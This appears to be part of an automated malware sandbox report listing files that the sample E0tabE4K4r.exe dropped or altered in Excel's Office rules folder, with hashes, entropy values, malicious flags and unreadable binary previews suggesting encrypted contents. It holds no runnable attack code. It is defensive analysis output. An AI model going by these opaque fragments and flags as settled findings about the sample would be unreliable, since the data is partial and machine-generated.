                                                                                                                                                  Preview:<?xml8q_.I...k.....s..O.l...w..A....,..k`....A..R..]...P..9..............6..Y .`)../NV.. ..P..}..9a.n.\.6..}8.K..]n.8..#A....GC.%...>..#^J*..1_`.X'41H.....W"..X.i.e.a...8.....O..'....1*.+.$1_q..}..}XF.\u.:Ss.|.w9..A..Q.....%..>....*.........4...../.......K.Ns....w.el)U<d....;[1b..$......,j.m[.P.{0l....V...6.~......{.p.......=....N4....D.............B....5.T.A|-i&m...w.k-..b...z..3.{....=q............ 9".D.;.gi..v.+~.j.-G.C......a|..NnoS....IA..g~......2!...C....W....l...N..?...|.v...W.b..hZ....(<k...`5.....]..@..JJ.3..zO~,:..M.f..I@4(B....k.....N.[.].p9=GQ...(.oC4.I.CS..T)...f.Td.|...<{.#^..!.h`......`..K-.mW.V.#....:..D...\..[...L..R.",KUHk...Bwq:{)|.\.c....q.BL.. .1.>....d."......Nu..wd.Y........:'........A..#..@0x._...$Q....=..t...gd..'....0QC..8z.K1R.6.}...u.3:.Qc..rd.A...)..+.....*g.o..9....5ou...N........b"p..5...b<.nM.....uG..c0R0pDZ..@........n.Z.%.../g.....:..S..2..v.Fm...|S...r.?Us.K....5..re=*.c.[..._.7 l...}..F.^....G&.7.Q).

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370006v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1120
                                                                                                                                                  Entropy (8bit):7.812017778093068
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:LUHxUD3loizrzJxylxWEi4aWABZYseloUBW3fJmtB0J2bD:oHE7rtxF4RABZjG0m7ZD
                                                                                                                                                  MD5:04EC78D489C5D1340EFCF51550AEBF84
                                                                                                                                                  SHA1:800356064A2E3E616EC510C6FD8786B0E1A5702C
                                                                                                                                                  SHA-256:829F68B8BD0DAC591C767E137CF96E1E795201D9CB0909FB6EFA9B7507090A7E
                                                                                                                                                  SHA-512:8D194854FAAC1FC1E97284B400ABAEA4F3E84015CE9FA2F1B21B0E8D2A627F1435A84A9543DF6204B8035B6A47B45D3692E44A5245D7456C131F435B56E2EC77
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.....7..9...wDN.......j..J...9$6"sJ.z;.jm.h..j........T....@..|~......C.........5..?.S.........'"...n.U..{uI..r......h..x.><.T.@.. .;.C.>u.F2D......3).........{.r.W..>....U=.a(!*+.3a....n..>#.+.r....(......dA].._.Wp...X....D...S...t.....{...<..9.T.dF..l.....2..x..../ .....@axm.#.Y......*..c..Y.....V..dh6..g;..&.5.f2......<Z..3{.....G..h\.A.O.%.O.7+*.G.g.%..{...{,..T....I^..iUd.o......(...v..i......Z.L.9....?..Gk>..CJm*.Pq.G,M.3>.nw....-.BF....SPM..~.1.Z..z....}..<..w..w.....D5.LV/..P..K.l.g...l..._...k...2..l.z].....F&4.P'%.D...:.........>M<l.n..B....f.#s.|..R>.E..B2.V?h.-".=.......Y.xk...q.w.-.j.#;.#....V$':K..O.X.+#...e.X..lJdh9h.&.t.`.j.0..&Vg..."F..v...`..7.9.0....j`M...w........+.....f.2..........'......X.xe$K..Q1.j...S....5?J..!...v<.D3V...q..OR,.(IU.Q...at!....P.@.Y.k.d.#...Gm+*......[k$.7o11D..4...2..*.q..A...\.N.d....._4.Q....C.pl....f.......G=.n.=.2.7....j.)M....zN[. .=s?....8..f...%.Gy.....[[...FB.._Gl..#.^...-3.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370007v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3678
                                                                                                                                                  Entropy (8bit):7.94917888442222
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:f8oeKwBN9pstM5ogfMks3yIQ6/KgLpshR6lCjx:f8xKU5ssUk116/JChR6lCjx
                                                                                                                                                  MD5:E0805FCC6BF7F9B22121B41AB97DE0BC
                                                                                                                                                  SHA1:71761FC28BE962E6934E8D1B28EB42AFE1F47A0C
                                                                                                                                                  SHA-256:12FFAEA3059C42CF4C3D63B2215AF9C9ECA28B9528318C8670ECC3392955FFCC
                                                                                                                                                  SHA-512:BF2687E89FC3B6C9C7C654610C1256F3F6DCDEF08F2712042C0218E6C2E232C598C26C2A0B2FC57F17D43057800ABCACC466D2A00A789F383BFF78B2705B3C39
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmle'6.v..^X]A..y..{...N...w....q6....Q...$:.b.j....$N..<.\..y/.7(c.....&.R,.Z.(Q...K2/.<v...h8TS.MS;...<w2..E.r.%......C..f......n.E.........eK.....=..l.8R.v............yww.....'.......T.<...1.M.x...&.y.., .~.(Ph.C.DY..j.......*.!.7.....E.U......G..$.X_.)M~....;..lk..t=.3..'...x.)..e..X..b."...|p.........X....P.y.......\p..%..a.N...7.....e...JyPrR... ...h.g.U..../..................U...<.C..AA......2.7...e.a.%.Y.50.Jq..c.}...h9..C.q.?.`/.X5.=o...#..2......n...Y...B.K.Uh....`..{....@..M....[.*{.....C....?....z.g.T.g....a..u.`h..x........q7G..9.<c.6f...D......E.>j.....an..8.....&.V......!{.G....Q.._.Y.... $d. .R...{a.ayB....?*4....~.Q3.....B8R4...%....\.JS-Q:.`(......*2.[....k1.!....R.ai6..R^..'.gg^X.db.q.r[. 05H......t...h......c>kbk./.h.X5.....4a.I..*..g\;m..i.=..a.k....S/.H......?.....H...".X.x..7.r.(..z6...d.Q..V.......f..mQ.m.z.e..tD.0.o...kT.........yoiB...Pz.....}*R.7V...I...D..'.c.....ds.+.l.|.........e.K........WYV....y..bI

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370009v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):961
                                                                                                                                                  Entropy (8bit):7.761269471968491
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:SM4509tgAP06CU5hif3ip2abIyZTWEITNGqyUM42bD:6508AMG3if6HZLIrjMrD
                                                                                                                                                  MD5:A1063E8A2238A047CC959F8BCE23D629
                                                                                                                                                  SHA1:C3CC06C2C429F9FAF8C1604C162A22895A0C1B27
                                                                                                                                                  SHA-256:BAD24AF049F8B7F279BF3A52E8575D1ED8699C9B2C12833387595D67B987C11B
                                                                                                                                                  SHA-512:6F3CC8148B3D80B7309A447120C21BCAA4F59BC35FB476A5E6B5D2DC27781A8B9D503674FBEC6ECAD1CDC3D45319906AF458620CEE84137FB4AD36D461D6AF58
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml@.@.....n:..J..Kk..#.......v....g..hW.<....a?Rm....AQ......jv.............@3...)T1Z..%G..p....D...%b.....?.n.H|...X]v..87jG\..5.q..e.0d...4.I..\.B...!.W..2.#n"6.X..D.....-.%....m.f]N<.F{9.....b.:.Fg^.o...\{A$d...1..k.O...w.......} &.@..w.7.qnI....l]......9'....~.4..U..<..|}.. f.6v...........]....>.^..[.>e.9..;j. .M...k..6D.....i|1.Z.Q...f.Uu.(.(.0...=.J.e....:\..gK...J.t...T.LA0b.........\j..~.?..l.....|..7(.h.-Kn..........d...e.4...l(0R....$8j..T.3.....c.k....:.\l<..X.Z....^...Z<l..P......yX..B-..7..R...v..o.a..@Z...T."K.ks........k1......0.n.l..'.pc.E.r{Z.Q....+.;4P.a.[.7.U.*.b.#..^.m...J.6Ux.\.+d.fY.......A2..Z.h)...Il.^9...)I...%.....:..%u....+..n..#..y..-......=.(.C,...n.....:.S..}..~)..:sQ..!..q_A.d:7A;.TJ)X.]R.Q.).}!T.p;.....\y.+<.M^.T..O.....9...o.....u....3.^M.=....EAQ....+.h....)..M....1.%.....C.r..{.......j.....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370011v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1191
                                                                                                                                                  Entropy (8bit):7.806161337372866
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:NlEMQpzPvWu1+Ey8klbV3d17EnmiwyyPVkY7GzmPwNuzFZM2bD:vEMQpSQyNh3dt6KPINuzFZD
                                                                                                                                                  MD5:57EF8E7184D6E0EE7FFC1C8D42A6663F
                                                                                                                                                  SHA1:5954B724E7B04E225E36DE6012166E3F8528DF22
                                                                                                                                                  SHA-256:33A27B86DE13DBD5A7C18ED5D1A19A6254190DB14C6D18155FC67C99BC1D4BC1
                                                                                                                                                  SHA-512:E4AF8F9F0A871699E69485A56AC23D052F3E0F2770277F706933BCE34DA1C58EDD0B67B505D5383B9607BDE177A20F43376067B72FC11311EFEC54236638208D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlzS`.b.8M3?._..dg...[~.....H4.....U..a...k...@.L..zHAWn....m*h......l........*.....dH...i....KS8.....rHs0.f...!.....]K..$..H\......\+..6.@S "@.NR....(6..$.....-.3@..)*....6.5y.I.k+t..<._..M.../...Y+.Y.}..N.TE...%..b.>.. ..2.>.S..O.H.....x..Y..@...&...g..b...^...3U\@E..*...R.d..a.=9...j..x.I....'a|..~......37..~&.o.d..;..).Bs{.jSG@.C..lG..CB)cx%N.c.='..+.O34..1H.F..".]@.CZ.....L...u~..H.......2A...dR"..2...Lsf.../.|.C...8T.._...H..A.a.G.+`..\t.%.(. ........gK..6.:..wI.d.....h.Lm_...y....(.E[.A[ ....).........!.p...(w......1.F..K.e9.@/.R..J....Q....Gs."]..2..F.1. _.>.Z.^..UT.. ..G-..6+..!.%...+!c.....L{.HF!.Q..^..!.2%F..@..M...12'y.XNF-..y.....;....<.;/Q...$..+.".m..N...0..(.....[....u *.,~..lb+KGg.........u.L.=d^..8.o..8<..&.s..ky....b.;\9%-.BU.DPJ.?O........Rg."=R...r.jNgn.\......?>.....}c...M-.K..{....t..W..B.V.K*rl,F.!&..n.:3./.K^.o.E...D\.V.....b.M.Ebx@.l.-..m.3,j._v..6Rt.C.U3G.D..c-..W..M.?..eN..-s"p..79vV....(J..2m.%}&1..:\.A.5...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370012v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):732
                                                                                                                                                  Entropy (8bit):7.643461055955711
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:gL0owLz2bZYzyV3PGug0OyRzHuS63vYSKtV2hQFloEdstSUdNcii9a:gLEuKk3PQczHuBASwV2o6g2bD
                                                                                                                                                  MD5:2A0979814F9AD59C68A222EF362EC0B9
                                                                                                                                                  SHA1:B676C78E290096CC18C34E756CF03BF2B0B1A548
                                                                                                                                                  SHA-256:DCECA7286A8D0DAA042682A8AE78C801BE1FBE1842288EA617E4E34225309648
                                                                                                                                                  SHA-512:07F0F9D516050B88BCBF3EDA2C56E483B66A226FB6963B6D973AAE69DED5DE57E0317CE2ACFB722A5DAC21228384FAB0D6D4B2FF29B1F1451648393EF97B0F2F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.s..W|.O..l.....Q...!2...4.......W.....2A...Wl`..o<..4....j..%..O..%1..5G...".4....|.@!.,..+8^..i..........=../.Ju.W4..I11.X....E|YB.J...2.m..u..k...#...Ea....O.<...#N..<..%...`..M3.O...tn.....=c.J ]R..f0`..u..2..hP..F.@$G..:.N......C.=..._X.<4F.....6.z<..8-.D.X.]Y...z6uh{....B....#.1x*...,q../.W2....2......r...*@.!du.c.z"QX.JQ&..<5T1|.[.IaD...?I3.#..._l..:C......M.<$. )....6.)Mm.&...V5......#.,X^.qJ.........*C6..J........`}N.y{...`.J..-...~8..?@.@..z.o..r...s....f....#4..8.z...Hv.r..J...J.....:.m.{...u6!.3.."2.r+..Q....'..Uz.2^..9.|...kYgl.;I8T-.l|.i...P...@.^(W..J9.;qG.2a..J.h.N......-........{G...%F...P%.n..DN.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule390004v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3616
                                                                                                                                                  Entropy (8bit):7.94900573967887
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:B4t/ZMB/WY3mXLOjlJttaq17sDOzO9T5D:B43MB/06rt1jC9T5D
                                                                                                                                                  MD5:C1647E7C771F270448746C8C3A21A6D0
                                                                                                                                                  SHA1:AF2314E38B9F5C5303118947EF9C21816201A91B
                                                                                                                                                  SHA-256:49637ACC25C63AD97837B86CA23EEC10D787A1695D7B2F17C3E6E126162BC1BA
                                                                                                                                                  SHA-512:E48BB7734366D3FC655D5B06BFBE8275791E1609204C48E41AEB4E1B743F6C72A2394392C8EA25D2DC0612764CD23F4887599031C6C24E1B807F9C2EB73E0BF3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.`.<.B.&G..Y`......iXs..i#d..U4rSyn...|p..v.@Y...W5...5$..ms.*..]....0!A..............cq$Bkp..X0......K...V.KJ6....6.....zvZ(_V.....U.S.'......."?.....3..R.......s.v.=iE.....F9....N.K.f&.M.s.....6...|....z.H....\.Y7mI....^.715./....[Y...R.*..N...{.....D2......Q.V....-.....h#.....A......f....Y...g Y-..L3.Jcy.%....?Q...z..7...........:.Tf.6e1....1....r.....b..P..ce.l.n.*)......ep@)p.....1..U.I'.v.6..^.Cj.D..Jz.?..A......2.?.r.../2*.5(ID.....Y.c.;e.d....+P.z....?.>.l._.....s..{.i...g..*..f......;.D.?...._..)......rT...z..!..#4.%h.q.3.I}.^.....u..{.v..a\..zR.F-X......?'..\.].V....9.j.Jt....I...7C........G]C>...<.a.9..q.v.[.......d..V.+.....E$..L..:..n0<..M.]...V3....E.x.[...u-...B.....OnA.;....E.M;F.B...R2TQ!hX...-.,V..k..V........&..9.f.....m.<.|..t.*..n...1..Gb..;..u<......:.oR._....M..B..v.-.....t.i_ W..l..rx.DsLNn.E....jX...k.(...o..o'...y......4dC....+Xv.s%..W.8T......Iz?.O....Nc...k:y....,[ct..l.J ...}.s5...4.^FI.s..Y.>...7.....#..P~..Q.e

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule390005v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):783
                                                                                                                                                  Entropy (8bit):7.72801110778231
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:u6SYmA0SMm6ar/a9KFgkGVW17BEM1mnhEu6aqWe228+eN+ddV8wElD5SUdNcii9a:u6SY/f/GEg017BvJNayWu6vC2bD
                                                                                                                                                  MD5:FDA83A1D2C3D40B8C0F2E527BC490C15
                                                                                                                                                  SHA1:A3D969F2A49137D5F2F78834B7BDF534F409572E
                                                                                                                                                  SHA-256:FF8BE183B84D0CB5E843D45C637BDEB084EDA0E2599E08461870EE0AB8B62A7A
                                                                                                                                                  SHA-512:1FFCF296E4EF504112D4D6AC0F1C90866C89D623BFEF1D8708CC5788423B329C49A9753559CF6075C02B6C3B5B91AF3864B5E33C72CD625EE238C42AD76C0B2F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...$.P........T..q.2.b(!.....A..n..*..b..(....|..8.73.B....p...`.C..o.f.8...M.n....<.....vT.9..ow.C..P...r^..........x.E.^d..@([....gM..@L&x....DT..:......: Kn.....*..d.;.)...."y`Jd..{..q4W.,.......$....k.l%<...U..`....OE._.I,....q.9.../.-Z:.&L.F...J..l..W.L\...7.....6..w...S(QC`-[r^B..6....?.A?;.bB.}..FM.?1.YrT.....f$.._...U.:V....%....b.. .|....r.C=.xwbD7.p.=.w./.)....&1g.....V.....PG.H..o.p;..................#....<.H^v<_.^..-A~.....`nY.C.%h&.?.....w..T.N...l.Nz.z..p..u.~:C`..~@.$...Vc.M.$7..`.G...e.C....j#..%Y...L..W}.^d...w@).i.2E.4.h..e.%=.qQ2,.T......^..;......g...|.+.k.+.Q.*V^..p..m^X.....3...L.......WR.....v..s.H..(..o....?.6.T.{.^ed-N...Iw..C..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440000v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2331
                                                                                                                                                  Entropy (8bit):7.919635782659727
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:E4+6wZHTz17MVFSlmqpW6drN20afhaKHRnhtosfVOFKlYbX0HFD:En6w1z1wVslmz6k1RWsMwYbkH9
                                                                                                                                                  MD5:C3B876B5B9E8304048B3FCEFF9DADF3C
                                                                                                                                                  SHA1:5BD8C129E33A0ABD4D1932C575D3E6C73023A41F
                                                                                                                                                  SHA-256:C8E047D8DAB1BF320C37C1BDE5E867CE673FF76A12FE774F35AA55E0E8BEBF27
                                                                                                                                                  SHA-512:7C60DC07C3BA2FFF97BF36A2F291DD720763BCE7F8BD8B762C224E70E5F194331FC74A394957669408D955219247CA5E1FAE635DD72CB7DE59D7EA6585CED840
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlNA..^..O.R.J.1...a&Hf.C.1... ..baq.......{..... .L.Y!'X..CuJ..Ks.....W..kd.iuN....w7....1"..b"...>..L6.....T...s.7..*......0."J+.R.]...GZm>..k ....&....O...Ja.a.1.G....$..Q....$i.LN&}L}..*.|p....{...n.."..<. .-UE...;...g.V....'.=...........k....ue.f......W{..[a...-x?.l.+k.|....?.y.....R....*...s'Sg.lc.E..k.].e......f.M.?T.yy...p...@+..[_..sO..A.C.......I..*b.1...'o>8....s..3.k...L....U...6.W...{.j..."...t.p..;.%o..6_.Cz..-.g<..."...Z...\.Ma..0.!c....AA..N..X....=t.z+...%..v.!H.....,i6..x....<)?......%=IB.U..X....b...Fh\....8t.N.H.5.....0..9..7.z~.Z.v.0g.u.......i*DM.Z...?m....8....e{....S........W..q.....o.{.G.w.UQ...2$.u.H..h...o. h.+..F.....;}.B,.h.}...[.XV ;._.4G..5....Q.1.)N..-).M.....<.}..4....^....(.j'^.....NS...:K.p........q...-[...|&.?^.|+daI..N./\.']j...~.;..XY.;IE&.`..B.H..=.\...B.q.f...ZO.yx......-.............b.-.(.o,.l;v.>N...]......I.H.E.....S.'M.U......W ".C.:.M.8.gn.u.....A...;...4[@V.^........fgG.g.....6..TSt...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440002v9.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):44492
                                                                                                                                                  Entropy (8bit):7.995395933179024
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:8FinrSodWXW7pgMq9bWbPt5TsY8FCDBeeeXpUAMX7ytjdKMv/zPR4D:8qrSodWXW9gVkbLWCDBl57ytjdDPR4D
                                                                                                                                                  MD5:A8ABB8814B23DA8EEC4FD5CED63F6C33
                                                                                                                                                  SHA1:BA38E093A6C28C24E6AC8842BC0E7F5FA4CF7FEF
                                                                                                                                                  SHA-256:6E008B8291BE1529A76A284826ADF54CC3DD006242B812338FF3A2B41A67D6E1
                                                                                                                                                  SHA-512:6C36BC26DE445A6063DF1DDAD94F61E0416C24371A8BB4D1631CDD339287D0ED321B131A391D2EE6E2D5B160DE18E9C9577B9682FA739F388083D43D858318B7
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:<?xml...}B..J5%.mK...>nI8/..).....9..6,..:..W..}.G..f....C...X)...H....L*..E.*.=.\...f~.0io...W0..sd..Zd.#p.....q.{...I>y.,!..j+".....x?..PR.9)U$...EJ.!.e@f..?c|:.E.^A.z...W....y..<nJ..._.k...1{.f......j.RG.......`...d=pEh....@;O...N....H........+.qv7....z.......o....x.:...=G..... ..Q.z..L...8b.M.V..LDJ....i.7i.1Fb....J....6.......i......6.=.W...p$.<)....X;.N.CU..w......b.d.1'. ...}..O......Y4M..y.!K.......a3\....O.XPDH..........c......+..w...d9.a0HH...'...7.R}.5D.V.?....*....--7kq...5F.W..7.U.Zr.m....zM.......c.IO.C;.{.L..H..1..!.D.....R{. ....b..........]\....G.c....d.\e.....{....0...........m....TN..g....#....|]MzL...LN..V!C.p.q.....r..i.r...C.3.....u.......0Z^.<G.........5..d..R..~.Y.\.,]C.kd7.X.Q.n.......rP...~8.....;.x/..d.D...m..eL.V.sA..(c.>...(s(.b.`...'J'..8..}J..G:...#D..`"kc...OC...-.B}9[az..z(.H.."...z(..V..P.lO.R...T.@..|....M9Z.8.yZ..4.Y.;.LPH"..n..k......m..1U..z...F..0.....-...&...."...d.....z@*..3Sk.(.....g..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440004v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2338
                                                                                                                                                  Entropy (8bit):7.917998060696755
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:8LgGmq/Of8ym3YlF/eBVVjYAJzMZqaheEFEsCg2i3m4WdD:8ENOsWVjROMti7U
                                                                                                                                                  MD5:BAB29743F665D0A2A00E3CEB54E2A4CF
                                                                                                                                                  SHA1:6E7B2A7D481D93DB6C01DA04C6ABF75FDF1C6A23
                                                                                                                                                  SHA-256:7BF6E3A118C7D1FA6C559EE6D2E5ACAFFA626F6468FEE131B19A7661B1B8942F
                                                                                                                                                  SHA-512:752ADA61B7B980CF2C2F7C613BDEDFC4226F2B2463064142CCABDE3D14DE8744482256771F842CC071670DD78C4A1652E4F985CDD754633721FCE5DABA11900B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlZ_B.im,......,T-..Fc..S&..y......8z+...C....C.d?.....k..f}.\..2.)..T..N..f..'....|...4.0..%>.Y>....5y.M..^...u..H...Sg...6|?.."....[...&i...AN......M.D(U.[..Ax..i.7s8u/v.8..|.1.Y.MLV.s..}..5....&U...p#%..^..3...'..$.Y8..5.m.....K.M..,...._..y...o..I........i...Su..".i.....Y/0..l.LQ...0r9i....p..Q4w.37.^e.Z$.:..KKjz...=.... .G.t.....1WW>...3.w0.Y.#.}W....eC.-X[b.J.5=.Sa.#.p...w...'F.T...^...Rk[3.}.C.6.......1...>.?XH..3t.7....N.@...wD.....M;.gp...MA........l<{\..K.l57.6..V...{.....Ico.]........5U....?....}.~.."..Kt3E.>....9._I^./.0NC.R.(%..d....4(...^q.y.q..:K........._MV.y.....d.u.sa.V.<..~..n$.....6.i..(G......g#.%..Q..v#.7..Dx.$;...-u...x....h..^.t..P..gN.z?Sn*...G....v.].4......^..F...<...K.G..f.7..0.tq......v.G.5B..,.;.A6.0t...3o.K..a.S.W......b.W.U....t@u&o.yk5.o..g.o-L#{Yb...v....d...k+..IBW..L`9.@..<Fd.G...=;.>..+...H.....R.."..8_.Y....Gh.pi..#.......6w...P..rQ......v...E..R...dm..p^..V.nSa.....\..-......v...../.SWG).G.t..f...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440005v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2320
                                                                                                                                                  Entropy (8bit):7.90776561350992
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:Q0sHv4KIn82vFmDDYP5F2BERDvCDFIOUuP3LNUD:Q0qv4FHwDDcFoEgDJTpA
                                                                                                                                                  MD5:A91A7110D56780B80DDF16B86352C934
                                                                                                                                                  SHA1:5E67253E93D9A0CD8B07166E55B13C6589419E10
                                                                                                                                                  SHA-256:7757B896A2374387D2EDB85A7456B8FD0E536FEBDDB6B0B6F9E07BB0AD2B0885
                                                                                                                                                  SHA-512:E9435EA94A645B76A98D042545A7775F0F6240D405E967147D9481ACC9ECB0E8651B132BBA37B4592F79BF06BD6AA9C8D54DDBCA8AD74C78FE2B2FF6155BAEEB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlm....Vn..X..#.fq....!t.A0]x1...V......N...eF..........K........&....Zg.F.L<C.].=.C.\..b!...m.E|..E.}7....Z.K.S.........'..B...)..i8...".|5{.,...d:V.]'I..t.u.-r..9/...W1.....+.!}..$91....~;.......SU..i1..dj...3......6..Fd....)b..8.}......&;|........w...$.D..E9.c.N.....s..S0....s.nI...i..7u?p...sk..x`L..(....q...M."D:........!9.!GR..:rT$+.^'zy.a.:+.UW.....6<..q..^./.N.....%.RB/..EE.d!.....y...1.......0..+......&...0n..z.N7..kY.a0.N........Lv.a./....4.u...f....bNf=&.O..*.....O..lf.RkA....#...g..4n.".....a''...fg.Pc..R..&.n..a?...`...!q..].%......o.{.Y")..-Tt....-@h...l@..0...x.D9{p1.f..7..".0..^.>..7...z.-....bF.....V&[..%...z.nI....z.oG...u....!}#..J..EA.k.8.[....j.Hs......Bo.j9...2..q3q..W.w7`.....^=..0"..-....ld@.Fy.6..FE.5Y..U....._Y..I..9..a.i.2f..{.....7z..q.......)J82!e.....#...PM......e$JXt.;R.X."PuX.......u..S.....=.."..'...WgzIG.B.....k.P.;.h@.n/Y*.....4.....+B..X.f'yX...(9,b.^..e.iE....Q.U..E (.......K^5.U..Ks.......?Q

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440007v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):41208
                                                                                                                                                  Entropy (8bit):7.996305003503829
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:rL51cuKe7HavgulFBEXevjsefabG2jwZWN/Cyf+Ct9Y3SfvjNjk+23A2GtKBQ:T37H4lwXhefKGxENBfjjNjYFUKG
                                                                                                                                                  MD5:4AB91BBDFDF6C44FBCDC01D281971B85
                                                                                                                                                  SHA1:B3B33D0D16E94F31B52033DF5AAF6C2FB6BE9E65
                                                                                                                                                  SHA-256:39F85BE27306A404D60B10B93EE005972B6ADF5F687BF01B52B2E8EB71F619E4
                                                                                                                                                  SHA-512:DD0F95FADB49AA17539EAFE28EE3DC2DB7D92D58B6D8EBBF0285DA90CA8D3CC11DADA3FD2894A4AFBA6BB7BC4CA5B125513C8AA25814DEE5B43E693F6EA6DF0E
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:<?xml..G.#...&hp%...&N..M..QE.<M..........-z..!....tl..y_;.ZJ....Q.l....W..X.(X.$$da...N.8Mu.P..|.X?.r~.A..Bz.+.A......?.n.bL....)Q..`..HHE[T=5L..p.#..7..Iw.....n.Mxx.[.. u...Q...J7....h...{h8.O..|..-.....4xH..0..N.'A.......N.U.#n.$...+....0....g.gh....3..Y....9...CJ{.}.)..z/...v."..&.C?kb%...+....eDa.!)..L....~.TR............?.;W!.E;.(P.1...s8..[:....{..0...*....p....>38...`....XYX".3.MWy_..a.......l....O.,$.........5....d.g.O..T..I?z:...r.i>..R...F..-.._..%bu..'...pj...[..&4..;.b.yC+..y.H.xZ....ti.f..B1.r$..j..tZ..1..7qnPs...R...(.9T.(u..mW\..[..;.....N...Hr.p..|Wq..\.3.8.....9.<r....u..(.s..oj.8..F...2.g. Qr..E..Z.wU.."..F...U.0.;.~..wW..r]J+Q...s..u.h...2..k<I.k&.=..cH......C;C.D.\........''V...H.....3_"/S(....U[.[|.=.,@xP+..U..u.....s.c[...Y.(..i...4..W.._.... ........s..=.2.U..5..;i.....G*........?..@ J.H.b3&......WR...m.0.o.p.m...?.H...K.,$...D.....D..n.3.8..5d.g..V.'..`;s...W....... .Tw\.....4u2.7^.....m."N..ez..c...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule460008v0.xml

                                                                                                                                                  Download File
